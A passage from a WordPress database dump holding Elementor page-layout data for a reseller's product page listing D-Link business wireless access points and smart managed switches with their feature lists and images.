]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7564,3409,'_elementor_version','2.5.14'),(7565,3409,'_elementor_edit_mode','builder'),(7568,3410,'_wp_page_template','template-fullwidth.php'),(7569,3410,'_elementor_template_type','post'),(7570,3410,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7571,3410,'_elementor_version','2.5.14'),(7572,3410,'_elementor_edit_mode','builder'),(7611,3416,'_wp_page_template','template-fullwidth.php'),(7604,3415,'_wp_page_template','template-fullwidth.php'),(7597,3414,'_wp_page_template','template-fullwidth.php'),(7598,3414,'_elementor_template_type','post'),(7590,3413,'_wp_page_template','template-fullwidth.php'),(7575,3411,'_wp_page_template','template-fullwidth.php'),(7576,3411,'_elementor_template_type','post'),(7577,3411,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business 